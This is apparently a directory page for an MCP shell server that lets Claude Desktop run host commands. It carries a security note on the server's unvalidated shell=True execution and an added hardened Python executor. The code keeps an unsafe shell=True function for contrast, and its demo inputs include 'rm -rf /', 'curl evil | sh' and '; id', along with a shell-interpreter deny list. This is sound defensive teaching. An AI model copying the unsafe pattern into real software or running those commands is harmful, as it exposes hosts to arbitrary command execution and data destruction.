Lilith-Shell
by charles-adedotun
Overview
Enables AI assistants (specifically Claude Desktop) to securely execute terminal commands on the host system through the Model Context Protocol (MCP).
Installation
python -m lilith_shell
Environment Variables
- LILITH_TIMEOUT
- LILITH_SHELL
- LILITH_ALLOW_LIST
- LILITH_WORK_DIR
- LILITH_MAX_OUTPUT
- LILITH_MODE
Security Notes
The provided `src/lilith_shell/executor.py` module, which contains the `handle_call_tool` function, passes the AI-supplied `command` argument straight to `subprocess.run` with `shell=True`. In the (truncated) file shown, nothing is called before that point to validate or sanitize the command: neither the `core/security.py` nor the `utils/sanitizer.py` module that the README's architecture section describes appears in the execution path.

The effect is unrestricted command execution: an AI assistant, or any process able to send MCP requests to this server, can run arbitrary commands on the host with the privileges of the user running the server. Because the string reaches a shell, every metacharacter in it is honoured (`;`, `&&`, `|`, `$(...)`, redirections), so even a naive allowlist check on the raw string would be bypassable; a real fix has to parse the command into an argv, check the program name against the allowlist, and run it with `shell=False`, in addition to enforcing the timeout, working directory and output limit that the environment variables above suggest.

The README describes command allowlisting, dangerous-command detection and security modes, but none of these are implemented or invoked in the core execution logic shown. As provided, the server should be considered unsafe to run.
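As an added example (written for this page, not Lilith-Shell's own code), here is an executor that enforces the controls the security note says are missing: the model-supplied string is split into an argv without a shell, the program name is checked against an allowlist, and the child runs with `shell=False`, a timeout, a fixed working directory and an output cap. The `Policy` fields and the `policy_from_env` mapping are my assumptions about what the `LILITH_*` variables listed above mean (in particular that `LILITH_ALLOW_LIST` is comma-separated); the page does not document their semantics. The `run_command_unsafe` function reproduces the `shell=True` pattern the note describes, for contrast only.

```python
# Added example for this page; not code from the Lilith-Shell project.
import os
import shlex
import shutil
import subprocess
import tempfile
from dataclasses import dataclass


class CommandRejected(Exception):
    """Raised before anything executes when the command fails policy."""


@dataclass(frozen=True)
class Policy:
    allow_list: frozenset                  # bare program names the model may run
    timeout: float = 10.0                  # seconds; assumed to mirror LILITH_TIMEOUT
    max_output: int = 4096                 # chars kept per stream; assumed LILITH_MAX_OUTPUT
    work_dir: str = tempfile.gettempdir()  # assumed LILITH_WORK_DIR


# Programs that hand an allowlisted argv straight back to a shell or another
# launcher, re-opening the injection the allowlist is meant to close.
SHELL_INTERPRETERS = frozenset({"sh", "bash", "dash", "zsh", "ksh", "fish", "env", "xargs"})


def policy_from_env(env=os.environ) -> Policy:
    """Hypothetical mapping of the LILITH_* variables onto Policy (assumed, not documented)."""
    names = [n.strip() for n in env.get("LILITH_ALLOW_LIST", "").split(",") if n.strip()]
    return Policy(
        allow_list=frozenset(names),
        timeout=float(env.get("LILITH_TIMEOUT", "10")),
        max_output=int(env.get("LILITH_MAX_OUTPUT", "4096")),
        work_dir=env.get("LILITH_WORK_DIR", tempfile.gettempdir()),
    )


def run_command_unsafe(command: str) -> subprocess.CompletedProcess:
    """The pattern the security note describes; kept only for contrast, never call it.

    Every shell metacharacter in `command` is honoured, so an allowlist check on
    the raw string is useless: 'ls; curl evil | sh' still starts with 'ls'.
    """
    return subprocess.run(command, shell=True, capture_output=True, text=True)


def vet_command(command: str, policy: Policy) -> list:
    """Turn the model-supplied string into an argv without invoking a shell.

    shlex.split applies POSIX quoting but never interprets ';', '&&', '|', '>'
    or '$(...)': they survive as literal arguments, so with shell=False they
    cannot start a second command.
    """
    try:
        argv = shlex.split(command)
    except ValueError as exc:  # unbalanced quotes
        raise CommandRejected(f"unparseable command: {exc}") from exc
    if not argv:
        raise CommandRejected("empty command")
    prog = argv[0]
    if "/" in prog or "\\" in prog:
        # /tmp/echo would satisfy a basename allowlist; only resolve bare names via PATH.
        raise CommandRejected(f"{prog!r}: program must be a bare name, not a path")
    if prog in SHELL_INTERPRETERS:
        raise CommandRejected(f"{prog!r} would reintroduce a shell")
    if prog not in policy.allow_list:
        raise CommandRejected(f"{prog!r} is not in the allow list")
    resolved = shutil.which(prog)
    if resolved is None:
        raise CommandRejected(f"{prog!r} not found on PATH")
    return [resolved, *argv[1:]]


def run_command(command: str, policy: Policy) -> dict:
    """Vet, then execute with shell=False, a timeout, a fixed cwd and an output cap."""
    argv = vet_command(command, policy)
    try:
        proc = subprocess.run(argv, shell=False, cwd=policy.work_dir, capture_output=True,
                              text=True, timeout=policy.timeout, check=False)
    except subprocess.TimeoutExpired:  # subprocess.run kills the child for us
        return {"argv": argv, "returncode": None, "stdout": "", "stderr": "",
                "timed_out": True, "truncated": False}
    return {
        "argv": argv,
        "returncode": proc.returncode,
        "stdout": proc.stdout[: policy.max_output],
        "stderr": proc.stderr[: policy.max_output],
        "timed_out": False,
        "truncated": len(proc.stdout) > policy.max_output,
    }


# Constructed demo policy: only echo and sleep, short timeout, small output cap.
DEMO_POLICY = Policy(allow_list=frozenset({"echo", "sleep"}), timeout=5.0, max_output=64)


if __name__ == "__main__":
    for cmd in ("echo hello && rm -rf /", "echo hi; id", "bash -c id", "/bin/echo x", "id"):
        try:
            print(repr(cmd), "->", run_command(cmd, DEMO_POLICY)["stdout"].rstrip())
        except CommandRejected as exc:
            print(repr(cmd), "-> rejected:", exc)
```

Run stand-alone, the demo shows `echo hello && rm -rf /` printing the literal text `hello && rm -rf /` (the `&&` is just an argument once no shell is involved), while `bash -c id`, a path-qualified program and anything outside the allowlist are rejected before any process is spawned. The allowlist is only as good as its contents: listing `bash`, `env`, `find` (with `-exec`) or an interpreter gives the model a shell again, which is why `SHELL_INTERPRETERS` is refused regardless of the list.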
Similar Servers
wcgw
Empowering chat applications to code, build, and run on your local machine by providing tightly integrated shell and code editing tools.
mcp-server-code-execution-mode
This server enables LLM agents to execute Python code in a highly secure, isolated container environment, facilitating complex multi-tool orchestration and data analysis with minimal LLM context token usage.
ssh-mcp-server
Bridging AI assistants to remote SSH server operations for command execution, file transfer, and server status retrieval via the Model Context Protocol (MCP).
dev-kit-mcp-server
A Model Context Protocol (MCP) server targeted for agent development tools, providing scoped authorized operations in the root project directory.